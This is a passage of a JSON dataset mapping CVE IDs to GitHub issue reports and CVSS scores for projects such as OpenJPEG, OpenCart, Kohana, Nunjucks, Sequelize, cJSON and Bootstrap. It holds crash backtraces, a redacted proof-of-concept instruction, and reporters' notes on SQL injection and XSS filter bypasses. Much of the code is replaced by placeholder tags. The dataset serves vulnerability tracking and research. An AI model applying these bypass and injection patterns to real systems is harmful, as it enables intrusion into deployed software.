NUMBERTAG bfff9dec, p_max_src_size NUMBERTAG p_cstr_inde NUMBERTAG d NUMBERTAG p_manager NUMBERTAG e4) at PATHTAG NUMBERTAG b7fc5d NUMBERTAG in opj_tcd_decode_tile (p_tcd NUMBERTAG p_src NUMBERTAG d8 PATHTAG p_max_length NUMBERTAG p_tile_no NUMBERTAG p_cstr_inde NUMBERTAG d NUMBERTAG p_manager NUMBERTAG e4) at PATHTAG NUMBERTAG b7fa NUMBERTAG a in opj_j2k_decode_tile (p_j2k NUMBERTAG p_tile_inde NUMBERTAG p_data NUMBERTAG c8 \"\", p_data_size NUMBERTAG p_stream NUMBERTAG p_manager NUMBERTAG e4) at PATHTAG NUMBERTAG b7fac NUMBERTAG in opj_j2k_decode_tiles (p_j2k NUMBERTAG p_stream NUMBERTAG p_manager NUMBERTAG e4) at PATHTAG NUMBERTAG b7fa NUMBERTAG e in opj_j2k_exec (p_j2k NUMBERTAG p_procedure_list NUMBERTAG p_stream NUMBERTAG p_manager NUMBERTAG e4) at PATHTAG NUMBERTAG b7facaf9 in opj_j2k_decode (p_j2k NUMBERTAG p_stream NUMBERTAG p_image NUMBERTAG cc0, p_manager NUMBERTAG e4) at PATHTAG NUMBERTAG b7fb1aad in opj_jp2_decode (jp NUMBERTAG p_stream NUMBERTAG p_image NUMBERTAG cc0, p_manager NUMBERTAG e4) at PATHTAG NUMBERTAG b7fb6c NUMBERTAG in opj_decode (p_codec NUMBERTAG b8, p_stream NUMBERTAG p_image NUMBERTAG cc0) at PATHTAG NUMBERTAG c2c0 in main (argc NUMBERTAG arg NUMBERTAG bffff NUMBERTAG at PATHTAG Simple Analysis The value of comp >dy is NUMBERTAG and the value of rpy is NUMBERTAG The value evaluated from (OPJ_INT NUMBERTAG comp >dy APITAG y%(OPJ_INT NUMBERTAG comp >dy<<rpy) will cause a divide by zero exception (SIGFPE). Proof of Concept file Please decode the following content with base NUMBERTAG algorithm. Then you should save the decoded content to a j2k file to generate the APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG PATHTAG PATHTAG APITAG APITAG APITAG APITAG PATHTAG APITAG PATHTAG APITAG APITAG APITAG PATHTAG PATHTAG APITAG APITAG tJy NUMBERTAG fprv/Z Credit This vulnerability was discovered by Ke Liu of Tencent's Xuanwu LAB.",
  1686. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  1687. "severity": "MEDIUM",
  1688. "baseScore": 6.5,
  1689. "impactScore": 3.6,
  1690. "exploitabilityScore": 2.8
  1691. },
  1692. {
  1693. "CVE_ID": "CVE-2016-10507",
  1694. "Issue_Url_old": "https://github.com/uclouvain/openjpeg/issues/833",
  1695. "Issue_Url_new": "https://github.com/uclouvain/openjpeg/issues/833",
  1696. "Repo_new": "uclouvain/openjpeg",
  1697. "Issue_Created_At": "2016-09-13T09:12:33Z",
  1698. "description": "Out of Bounds Read in function bmp NUMBERTAG toimage of convertbmp.c. DESCRIPTION ============== An Out of Bounds Read issue was found in function bmp NUMBERTAG toimage of convertbmp.c. The root cause of this issue was an Integer Overflow issue. The opj_compress process may crash in other functions. CREDIT ============== This vulnerability was discovered by Ke Liu of Tencent's Xuanwu LAB . TESTED VERSION ============== Master version of APITAG NUMBERTAG f, PATHTAG ) EXCEPTION LOG ============== ERRORTAG ANALYSIS ============== The integer overflow issue exists in function bmptoimage. Here APITAG NUMBERTAG and APITAG NUMBERTAG and stride should equals NUMBERTAG APITAG But actually stride equals NUMBERTAG when overflow happened. CODETAG",
  1699. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  1700. "severity": "MEDIUM",
  1701. "baseScore": 6.5,
  1702. "impactScore": 3.6,
  1703. "exploitabilityScore": 2.8
  1704. },
  1705. {
  1706. "CVE_ID": "CVE-2016-10509",
  1707. "Issue_Url_old": "https://github.com/opencart/opencart/issues/4114",
  1708. "Issue_Url_new": "https://github.com/opencart/opencart/issues/4114",
  1709. "Repo_new": "opencart/opencart",
  1710. "Issue_Created_At": "2016-03-14T09:58:52Z",
  1711. "description": "Input not sanitized. Hi, I think I found a variable that's not sanitized and could lead to a SQL Injection or information disclosure. The source is APITAG $carrier = $this >request APITAG As I checked under APITAG documention Request class uses APITAG and encodes double quotes so it's still possible to use single quote right? Most of your database queries use APITAG to prevent that from happening. I found one that don't use escape before going to a SQL query. So we have this line: $carrier = $this >request APITAG (...) $this >model_openbay_amazon APITAG $carrier, $carrier_from_list, !empty($carrier) ? $this >request >post['tracking'][$order_id] : ''); After this it calls FILETAG file: public function APITAG $courier_id, $courier_from_list, $tracking_no) { $this >db >query(\" UPDATE APITAG SET APITAG = '\" . $courier_id . \"', APITAG = \" . (int)!$courier_from_list . \", APITAG = '\" . $tracking_no . \"' WHERE APITAG = \" . (int)$order_id . \"\"); } Because the single quote is not escaped and Query class uses single quote to delimiter possible SQL Injection in place. A possible solution is to use APITAG function on courier_id. I hope I'm not mistaken and feel free to give me your feedback. Best,",
  1712. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  1713. "severity": "HIGH",
  1714. "baseScore": 7.2,
  1715. "impactScore": 5.9,
  1716. "exploitabilityScore": 1.2
  1717. },
  1718. {
  1719. "CVE_ID": "CVE-2016-10510",
  1720. "Issue_Url_old": "https://github.com/kohana/kohana/issues/107",
  1721. "Issue_Url_new": "https://github.com/kohana/kohana/issues/107",
  1722. "Repo_new": "kohana/kohana",
  1723. "Issue_Created_At": "2016-05-18T17:29:05Z",
  1724. "description": "Security::strip_image_tags bypass. Hi, I found a security issue on your latest version. In your security class \u2013 PATHTAG you have the following function to remove img tags from strings: ERRORTAG Just by looking at that regex it's possible to see that after <img it expects a space. So to bypass this you could use: <img/src... PHP example: ERRORTAG And it's still possible to inject a IMG on a string in this case with a XSS vector. Hope it helps. Best, David Sopas Checkmarx.com",
  1725. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  1726. "severity": "MEDIUM",
  1727. "baseScore": 6.1,
  1728. "impactScore": 2.7,
  1729. "exploitabilityScore": 2.8
  1730. },
  1731. {
  1732. "CVE_ID": "CVE-2016-10513",
  1733. "Issue_Url_old": "https://github.com/Piwigo/Piwigo/issues/548",
  1734. "Issue_Url_new": "https://github.com/piwigo/piwigo/issues/548",
  1735. "Repo_new": "piwigo/piwigo",
  1736. "Issue_Created_At": "2016-11-17T13:10:10Z",
  1737. "description": "quick search and HTML comment. Sanitize quick search expression before sending it to HTML comment on frontend",
  1738. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  1739. "severity": "MEDIUM",
  1740. "baseScore": 6.1,
  1741. "impactScore": 2.7,
  1742. "exploitabilityScore": 2.8
  1743. },
  1744. {
  1745. "CVE_ID": "CVE-2016-10514",
  1746. "Issue_Url_old": "https://github.com/Piwigo/Piwigo/issues/547",
  1747. "Issue_Url_new": "https://github.com/piwigo/piwigo/issues/547",
  1748. "Repo_new": "piwigo/piwigo",
  1749. "Issue_Created_At": "2016-11-17T12:37:46Z",
  1750. "description": "increase checks on url format. Basic filter_var($url, FILTER_VALIDATE_URL, FILTER_FLAG_SCHEME_REQUIRED | FILTER_FLAG_HOST_REQUIRED) is not very strong. We need something stronger.",
  1751. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
  1752. "severity": "MEDIUM",
  1753. "baseScore": 6.5,
  1754. "impactScore": 3.6,
  1755. "exploitabilityScore": 2.8
  1756. },
  1757. {
  1758. "CVE_ID": "CVE-2016-10519",
  1759. "Issue_Url_old": "https://github.com/feross/bittorrent-dht/issues/87",
  1760. "Issue_Url_new": "https://github.com/webtorrent/bittorrent-dht/issues/87",
  1761. "Repo_new": "webtorrent/bittorrent-dht",
  1762. "Issue_Created_At": "2016-01-02T21:59:46Z",
  1763. "description": "IMPORTANT: Critical security issue fixed in NUMBERTAG All users should upgrade.. We just fixed a security issue in the APITAG module that would allow an attacker to send a specific series of messages to a listening peer to make it disclose internal memory of the FILETAG process. All users of APITAG should upgrade to version NUMBERTAG or later.",
  1764. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  1765. "severity": "HIGH",
  1766. "baseScore": 7.5,
  1767. "impactScore": 3.6,
  1768. "exploitabilityScore": 3.9
  1769. },
  1770. {
  1771. "CVE_ID": "CVE-2016-10523",
  1772. "Issue_Url_old": "https://github.com/mcollina/mosca/issues/393",
  1773. "Issue_Url_new": "https://github.com/moscajs/mosca/issues/393",
  1774. "Repo_new": "moscajs/mosca",
  1775. "Issue_Created_At": "2016-01-14T15:53:51Z",
  1776. "description": "Mosca crashes when connecting with TLS on MQTT Port. By accident we have found critical behavior in Mosca: when connecting with a TLS connection on the plain mqtt port, the whole broker simple crashes with error: ERRORTAG One liner to reproduce this behavior (assuming standard mosca running on localhost): APITAG We will dig further into it and provide a PR if we have a fix. Meanwhile we wanted to share the bug in case somebody is quicker in spotting the solution.",
  1777. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  1778. "severity": "HIGH",
  1779. "baseScore": 7.5,
  1780. "impactScore": 3.6,
  1781. "exploitabilityScore": 3.9
  1782. },
  1783. {
  1784. "CVE_ID": "CVE-2016-10525",
  1785. "Issue_Url_old": "https://github.com/dwyl/hapi-auth-jwt2/issues/111",
  1786. "Issue_Url_new": "https://github.com/dwyl/hapi-auth-jwt2/issues/111",
  1787. "Repo_new": "dwyl/hapi-auth-jwt2",
  1788. "Issue_Created_At": "2015-10-14T19:20:42Z",
  1789. "description": "Regression: APITAG is true and APITAG is {} when user not logged in. With the latest version of the plugin my APITAG routes exhibit this behaviour. This did not happen previously.",
  1790. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  1791. "severity": "CRITICAL",
  1792. "baseScore": 9.8,
  1793. "impactScore": 5.9,
  1794. "exploitabilityScore": 3.9
  1795. },
  1796. {
  1797. "CVE_ID": "CVE-2016-10527",
  1798. "Issue_Url_old": "https://github.com/riot/compiler/issues/46",
  1799. "Issue_Url_new": "https://github.com/riot/compiler/issues/46",
  1800. "Repo_new": "riot/compiler",
  1801. "Issue_Created_At": "2016-01-16T18:23:33Z",
  1802. "description": "NUMBERTAG unpublished. riot compiler NUMBERTAG has an issue in a regex APITAG Backtracking) thats make it unusable under certain conditions, so it is unpublished now.",
  1803. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  1804. "severity": "HIGH",
  1805. "baseScore": 7.5,
  1806. "impactScore": 3.6,
  1807. "exploitabilityScore": 3.9
  1808. },
  1809. {
  1810. "CVE_ID": "CVE-2016-10533",
  1811. "Issue_Url_old": "https://github.com/florianholzapfel/express-restify-mongoose/issues/252",
  1812. "Issue_Url_new": "https://github.com/florianholzapfel/express-restify-mongoose/issues/252",
  1813. "Repo_new": "florianholzapfel/express-restify-mongoose",
  1814. "Issue_Created_At": "2016-02-13T08:48:50Z",
  1815. "description": "Leaking private/protected data. say you have an User model: APITAG normally you want to never expose the password, under any circumstances, so you'd normally do: APITAG Now this works with hitting any endpoint: APITAG does not show the fields APITAG also does not show the password HOWEVER: APITAG shows ALL passwords for ALL users in the database ... This is a huge security concern",
  1816. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  1817. "severity": "HIGH",
  1818. "baseScore": 8.8,
  1819. "impactScore": 5.9,
  1820. "exploitabilityScore": 2.8
  1821. },
  1822. {
  1823. "CVE_ID": "CVE-2016-10534",
  1824. "Issue_Url_old": "https://github.com/electron-userland/electron-packager/issues/333",
  1825. "Issue_Url_new": "https://github.com/electron/electron-packager/issues/333",
  1826. "Repo_new": "electron/electron-packager",
  1827. "Issue_Created_At": "2016-04-19T01:29:54Z",
  1828. "description": "SECURITY NOTICE: electron packager NUMBERTAG don't check SSL certificate validity. There exists a bug in electron packager from versions NUMBERTAG where the APITAG command line option defaults to false when not explicitly set to true . This only affects users using the electron packager CLI. The APITAG option defaults to true for the FILETAG API. The commit that introduced the issue is here: URLTAG The issue is fixed in NUMBERTAG",
  1829. "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N",
  1830. "severity": "MEDIUM",
  1831. "baseScore": 5.9,
  1832. "impactScore": 3.6,
  1833. "exploitabilityScore": 2.2
  1834. },
  1835. {
  1836. "CVE_ID": "CVE-2016-10538",
  1837. "Issue_Url_old": "https://github.com/node-js-libs/cli/issues/81",
  1838. "Issue_Url_new": "https://github.com/node-js-libs/cli/issues/81",
  1839. "Repo_new": "node-js-libs/cli",
  1840. "Issue_Created_At": "2016-06-16T08:30:30Z",
  1841. "description": "[security] Insecure usage of temporary files.. The current code makes use of predictable filenames, in a way that causes a security issue. I reported this to Debian last year: CVETAG It was recently highlighted by the nodesecurity people (six months later!): URLTAG Suggested fix: Avoid using predictable filenames in world writable directories. Using APITAG would be better than APITAG for example.",
  1842. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N",
  1843. "severity": "LOW",
  1844. "baseScore": 3.5,
  1845. "impactScore": 1.4,
  1846. "exploitabilityScore": 2.1
  1847. },
  1848. {
  1849. "CVE_ID": "CVE-2016-10542",
  1850. "Issue_Url_old": "https://github.com/nodejs/node/issues/7388",
  1851. "Issue_Url_new": "https://github.com/nodejs/node/issues/7388",
  1852. "Repo_new": "nodejs/node",
  1853. "Issue_Created_At": "2016-06-23T16:09:20Z",
  1854. "description": "Error: APITAG failed exploit/(d)dos?. Version NUMBERTAG Platform : Linu NUMBERTAG generic APITAG Ubuntu SMP Thu Jun NUMBERTAG UTC NUMBERTAG APITAG APITAG Node server using socket.io is getting hit by some kind of attack that makes it crash, with the error APITAG failed\". At first I thought I'm just trying to process some really long string sent via sockets by an user, but it's not, it crashes even without doing anything with the messages coming in from the socket events. The code below is the most barebones I could get the actual server while still having it be vulnerable to whatever this is. The \"socketio wildcard\" was only added to this so I could see all the events sent in, but there is none when it's actually crashing, just a new connection opening then it goes down. It's definitely some sort of attack or exploit, cloning the server to a different IP made it stop, until after the new was released to the public (site put back online). There were also some spikes in traffic but they didn't coincide with the actual crashes so I'm gonna assume they were just some failed ddos attempts not related to this issue. Anyone encountered this before? Code: ERRORTAG Error: ERRORTAG Full log of the output when crashing: URLTAG Couldn't do anymore logging because after some time the \"attack\" stopped, it used to keep going even after the server crashed, but right now it seems to be more \"calculated\" so to speak, stopping as soon as the server crashes, making it really difficult for me to debug anything.",
  1855. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  1856. "severity": "HIGH",
  1857. "baseScore": 7.5,
  1858. "impactScore": 3.6,
  1859. "exploitabilityScore": 3.9
  1860. },
  1861. {
  1862. "CVE_ID": "CVE-2016-10543",
  1863. "Issue_Url_old": "https://github.com/hapijs/hapi/issues/3228",
  1864. "Issue_Url_new": "https://github.com/hapijs/hapi/issues/3228",
  1865. "Repo_new": "hapijs/hapi",
  1866. "Issue_Created_At": "2016-07-04T04:26:55Z",
  1867. "description": "Update hapijs/call to NUMBERTAG from NUMBERTAG",
  1868. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N",
  1869. "severity": "MEDIUM",
  1870. "baseScore": 5.3,
  1871. "impactScore": 1.4,
  1872. "exploitabilityScore": 3.9
  1873. },
  1874. {
  1875. "CVE_ID": "CVE-2016-10547",
  1876. "Issue_Url_old": "https://github.com/mozilla/nunjucks/issues/835",
  1877. "Issue_Url_new": "https://github.com/mozilla/nunjucks/issues/835",
  1878. "Repo_new": "mozilla/nunjucks",
  1879. "Issue_Created_At": "2016-09-07T03:56:25Z",
  1880. "description": "Bypass autoescape / XSS. The following string works as expected: ERRORTAG If however the variable passed to the template is an array autoescape does nothing: ERRORTAG If a autoescape is on any variable that is rendered in a {{ }} block I would expect it to escaped. This looks to be intentional from: URLTAG In express / Koa / (anything else using qs or body parser) is is trivial to coerce. See the following simple example in express: ERRORTAG APITAG I created a more detailed writeup and example app at: URLTAG",
  1881. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  1882. "severity": "MEDIUM",
  1883. "baseScore": 6.1,
  1884. "impactScore": 2.7,
  1885. "exploitabilityScore": 2.8
  1886. },
  1887. {
  1888. "CVE_ID": "CVE-2016-10551",
  1889. "Issue_Url_old": "https://github.com/balderdashy/waterline/issues/1219",
  1890. "Issue_Url_new": "https://github.com/balderdashy/sails/issues/5347",
  1891. "Repo_new": "balderdashy/sails",
  1892. "Issue_Created_At": "2015-11-17T01:15:37Z",
  1893. "description": "SQL Injection with default blueprints in Waterline. I have a model called \"patients\" which is using the default find blueprint in sails (it's controller definition is just APITAG ). I have a sinking suspicion it may have to do with node mysql not actually supporting prepared statements ( URLTAG I'm able to recreate the issue on any string field by passing in APITAG in APITAG as a where criteria. E.g. this: APITAG Returns all records in the patients table. Scary. I have: APITAG In my FILETAG . Has anyone else experienced anything similar?",
  1894. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  1895. "severity": "CRITICAL",
  1896. "baseScore": 9.8,
  1897. "impactScore": 5.9,
  1898. "exploitabilityScore": 3.9
  1899. },
  1900. {
  1901. "CVE_ID": "CVE-2016-10555",
  1902. "Issue_Url_old": "https://github.com/hokaccha/node-jwt-simple/issues/14",
  1903. "Issue_Url_new": "https://github.com/hokaccha/node-jwt-simple/issues/14",
  1904. "Repo_new": "hokaccha/node-jwt-simple",
  1905. "Issue_Created_At": "2015-04-01T16:41:32Z",
  1906. "description": "Add a verify(token, algorithm, APITAG method as per this posting regarding vulnerabilities in jwt: URLTAG",
  1907. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N",
  1908. "severity": "MEDIUM",
  1909. "baseScore": 6.5,
  1910. "impactScore": 3.6,
  1911. "exploitabilityScore": 2.8
  1912. },
  1913. {
  1914. "CVE_ID": "CVE-2016-10556",
  1915. "Issue_Url_old": "https://github.com/sequelize/sequelize/issues/5671",
  1916. "Issue_Url_new": "https://github.com/sequelize/sequelize/issues/5671",
  1917. "Repo_new": "sequelize/sequelize",
  1918. "Issue_Created_At": "2016-03-29T12:15:17Z",
  1919. "description": "sql injection in \"IN\" statement. i'm using mssql. sequelize version is NUMBERTAG sample: ERRORTAG because tedious doesn't support arrays as parameters you must add a parameter for every item in the array and use it in the query ( APITAG ). now there is an option to do sql injection.",
  1920. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  1921. "severity": "HIGH",
  1922. "baseScore": 7.5,
  1923. "impactScore": 3.6,
  1924. "exploitabilityScore": 3.9
  1925. },
  1926. {
  1927. "CVE_ID": "CVE-2016-10663",
  1928. "Issue_Url_old": "https://github.com/wixtoolset/issues/issues/6187",
  1929. "Issue_Url_new": "https://github.com/wixtoolset/issues/issues/6187",
  1930. "Repo_new": "wixtoolset/issues",
  1931. "Issue_Created_At": "2020-06-10T22:51:59Z",
  1932. "description": "Has CVETAG been addressed?. CVETAG concerns Wix but I can't see it addressed anywhere in the issues list. Are you aware of it and what's the resolution, if any? URLTAG",
  1933. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
  1934. "severity": "HIGH",
  1935. "baseScore": 8.1,
  1936. "impactScore": 5.9,
  1937. "exploitabilityScore": 2.2
  1938. },
  1939. {
  1940. "CVE_ID": "CVE-2016-10707",
  1941. "Issue_Url_old": "https://github.com/jquery/jquery/issues/3133",
  1942. "Issue_Url_new": "https://github.com/jquery/jquery/issues/3133",
  1943. "Repo_new": "jquery/jquery",
  1944. "Issue_Created_At": "2016-05-29T19:06:12Z",
  1945. "description": "Boolean attribute getters throw if the attribute name is not all lowercase. APITAG Description In NUMBERTAG we removed our logic that lowercased attribute names. This caused one regression: any attribute getter using a name for boolean attributes but not all lowercased is going into an infinite recursion, exceeding the stack call limit. Amongst others, this is breaking the APITAG test suite when tested with APITAG NUMBERTAG rc1. Link to test case URLTAG Basically, APITAG is enough to trigger the error.",
  1946. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  1947. "severity": "HIGH",
  1948. "baseScore": 7.5,
  1949. "impactScore": 3.6,
  1950. "exploitabilityScore": 3.9
  1951. },
  1952. {
  1953. "CVE_ID": "CVE-2016-10718",
  1954. "Issue_Url_old": "https://github.com/brave/browser-laptop/issues/5007",
  1955. "Issue_Url_new": "https://github.com/brave/browser-laptop/issues/5007",
  1956. "Repo_new": "brave/browser-laptop",
  1957. "Issue_Created_At": "2016-10-20T16:30:26Z",
  1958. "description": "the last open tab should only be saved if the window is closed. Did you search for similar issues before submitting this one? Yes Describe the issue you encountered: If you have a single window with only one tab and you close the tab itself that tab should not be restored on the next load. It should only be saved if the window is closed while the tab is still open. This is one of two bugs that enables a APITAG from URLTAG Expected behavior: If the tab is closed it should not be restored when Brave is opened again Platform APITAG NUMBERTAG APITAG Linux distro?): Win and Linux Brave Version NUMBERTAG Steps to reproduce NUMBERTAG Open this page CODETAG NUMBERTAG Click the link to close the tab NUMBERTAG Reopen Brave If the page is changed to call the script without the click it becomes a APITAG on Windows and Linux if it is the only tab in the last window",
  1959. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  1960. "severity": "HIGH",
  1961. "baseScore": 7.5,
  1962. "impactScore": 3.6,
  1963. "exploitabilityScore": 3.9
  1964. },
  1965. {
  1966. "CVE_ID": "CVE-2016-10718",
  1967. "Issue_Url_old": "https://github.com/brave/browser-laptop/issues/5006",
  1968. "Issue_Url_new": "https://github.com/brave/browser-laptop/issues/5006",
  1969. "Repo_new": "brave/browser-laptop",
  1970. "Issue_Created_At": "2016-10-20T16:26:46Z",
  1971. "description": "APITAG should be blocked unless the script also opened the tab. Did you search for similar issues before submitting this one? Yes Describe the issue you encountered: From URLTAG It is possible for a tab to close itself even if the tab was not opened by a script. In Chrome this is blocked with the message Scripts may close only the windows that were opened by it which is controlled by webkit APITAG APITAG . Expected behavior: APITAG should only allow a tab to be closed if it was opened by the script Platform APITAG NUMBERTAG APITAG Linux distro?): All Brave Version NUMBERTAG Steps to reproduce NUMBERTAG Open a page with CODETAG",
  1972. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  1973. "severity": "HIGH",
  1974. "baseScore": 7.5,
  1975. "impactScore": 3.6,
  1976. "exploitabilityScore": 3.9
  1977. },
  1978. {
  1979. "CVE_ID": "CVE-2016-10721",
  1980. "Issue_Url_old": "https://github.com/Thomas-Tsai/partclone/issues/82",
  1981. "Issue_Url_new": "https://github.com/thomas-tsai/partclone/issues/82",
  1982. "Repo_new": "thomas-tsai/partclone",
  1983. "Issue_Created_At": "2016-11-14T22:05:40Z",
  1984. "description": "Restore Heap Overflow. ERRORTAG",
  1985. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  1986. "severity": "CRITICAL",
  1987. "baseScore": 9.8,
  1988. "impactScore": 5.9,
  1989. "exploitabilityScore": 3.9
  1990. },
  1991. {
  1992. "CVE_ID": "CVE-2016-10722",
  1993. "Issue_Url_old": "https://github.com/Thomas-Tsai/partclone/issues/71",
  1994. "Issue_Url_new": "https://github.com/thomas-tsai/partclone/issues/71",
  1995. "Repo_new": "thomas-tsai/partclone",
  1996. "Issue_Created_At": "2016-01-05T18:58:27Z",
  1997. "description": "FAT Bitmap Heap Overflow. ERRORTAG",
  1998. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  1999. "severity": "CRITICAL",
  2000. "baseScore": 9.8,
  2001. "impactScore": 5.9,
  2002. "exploitabilityScore": 3.9
  2003. },
  2004. {
  2005. "CVE_ID": "CVE-2016-10735",
  2006. "Issue_Url_old": "https://github.com/twbs/bootstrap/issues/20184",
  2007. "Issue_Url_new": "https://github.com/twbs/bootstrap/issues/20184",
  2008. "Repo_new": "twbs/bootstrap",
  2009. "Issue_Created_At": "2016-06-27T15:33:54Z",
  2010. "description": "XSS in data target attribute. The data target attribute is vulnerable to Cross Site Scripting attacks: APITAG APITAG APITAG APITAG APITAG APITAG APITAG This is safe in HTML, but becomes vulnerable with Bootstrap.",
  2011. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  2012. "severity": "MEDIUM",
  2013. "baseScore": 6.1,
  2014. "impactScore": 2.7,
  2015. "exploitabilityScore": 2.8
  2016. },
  2017. {
  2018. "CVE_ID": "CVE-2016-10735",
  2019. "Issue_Url_old": "https://github.com/twbs/bootstrap/issues/27915",
  2020. "Issue_Url_new": "https://github.com/twbs/bootstrap/issues/27915",
  2021. "Repo_new": "twbs/bootstrap",
  2022. "Issue_Created_At": "2018-12-23T16:23:10Z",
  2023. "description": "Github considers bootstrap NUMBERTAG as insecure. Hi Bootstrap team. Github considers bootstrap NUMBERTAG as an insecure dependency via its security vulnerabilities alerts tool: URLTAG It points to the URLTAG page and this page shows that only NUMBERTAG is secure. Does NUMBERTAG is safe to use as it has a fix for the URLTAG vulnerability or it is something different? screenshot from one of our private projects FILETAG",
  2024. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  2025. "severity": "MEDIUM",
  2026. "baseScore": 6.1,
  2027. "impactScore": 2.7,
  2028. "exploitabilityScore": 2.8
  2029. },
  2030. {
  2031. "CVE_ID": "CVE-2016-10744",
  2032. "Issue_Url_old": "https://github.com/select2/select2/issues/4587",
  2033. "Issue_Url_new": "https://github.com/select2/select2/issues/4587",
  2034. "Repo_new": "select2/select2",
  2035. "Issue_Created_At": "2016-09-15T13:35:32Z",
  2036. "description": "XSS vulnerability in URLTAG Under APITAG remote data\", the data that is retrieved remotely is not sanitized before displaying it, and this should be done to prevent XSS issues. For example, when I enter _je1_ in the input field, one of the retrieved APITAG repo's data contains malicious JS code that is executed and that simulates a fake APITAG page which asks for your credit card info (seems like phishing).",
  2037. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  2038. "severity": "MEDIUM",
  2039. "baseScore": 6.1,
  2040. "impactScore": 2.7,
  2041. "exploitabilityScore": 2.8
  2042. },
  2043. {
  2044. "CVE_ID": "CVE-2016-10749",
  2045. "Issue_Url_old": "https://github.com/DaveGamble/cJSON/issues/30",
  2046. "Issue_Url_new": "https://github.com/davegamble/cjson/issues/30",
  2047. "Repo_new": "davegamble/cjson",
  2048. "Issue_Created_At": "2016-10-01T08:19:37Z",
  2049. "description": "cJSON buffer overflow with odd formatted JSON string. Hi, I would like to report a buffer overflow in cJSON, you can test this APITAG with a ODD string CODETAG building it with ASAN will trigger a out of bound on the input string, which it can be problematic since in lot of use cases the JSON input to applications using cJSON is untrusted. Thanks Marco > APITAG NUMBERTAG ERROR: APITAG global buffer overflow on address NUMBERTAG d5 at pc NUMBERTAG fb bp NUMBERTAG fff5fbff2a0 sp NUMBERTAG fff5fbff NUMBERTAG READ of size NUMBERTAG at NUMBERTAG d5 thread T NUMBERTAG fa in parse_string APITAG NUMBERTAG a NUMBERTAG in parse_value APITAG NUMBERTAG bb in APITAG APITAG NUMBERTAG dfa in APITAG APITAG NUMBERTAG e NUMBERTAG in main APITAG NUMBERTAG fff NUMBERTAG bb5ac in start APITAG NUMBERTAG d5 is located NUMBERTAG bytes to the right of global variable '<string literal>' defined in PATHTAG NUMBERTAG c0) of size NUMBERTAG string literal>' is ascii string NUMBERTAG SUMMARY: APITAG global buffer overflow APITAG in parse_string > Shadow bytes around the buggy address NUMBERTAG c NUMBERTAG f9 f9 f9 f9 f9 f9 f NUMBERTAG f9 f9 f9 f9 f9 f9 f NUMBERTAG d NUMBERTAG f9 f9 f9 f9 f9 f9 f NUMBERTAG f9 f9 f9 f9 f9 f9 f NUMBERTAG e NUMBERTAG f9 f9 f9 f9 f9 f9 f NUMBERTAG f9 f9 f9 f9 f9 f9 f NUMBERTAG f NUMBERTAG f9 f9 f9 f9 f9 f9 f NUMBERTAG f9 f9 f9 f9 f9 f9 f NUMBERTAG f9 f9 f9 f9 f9 f9 f NUMBERTAG f9 f9 f9 f9 f9 f9 f NUMBERTAG f9 f9 f9 f9 f NUMBERTAG f9 f9 f9 f9 f9 f9 f NUMBERTAG f9 f9 f9 f9 f9 f9 f NUMBERTAG f9 f9 f9 f9 f9 f9 f NUMBERTAG f9 f9 f9 f9 f9 f9 f NUMBERTAG f9 f9 f9 f9 f9 f9 f NUMBERTAG f9 f9 f9 f9 f9 f9 f NUMBERTAG f9 f9 f9 f9 f9 f9 f NUMBERTAG f9 f9 f9 f9 f9 f9 f NUMBERTAG f9 f9 f9 f9 f9 f9 f9 > Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): > Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa > Heap right redzone: fb > Freed heap region: fd > Stack left redzone: f1 > Stack mid redzone: f2 > Stack right redzone: f3 > 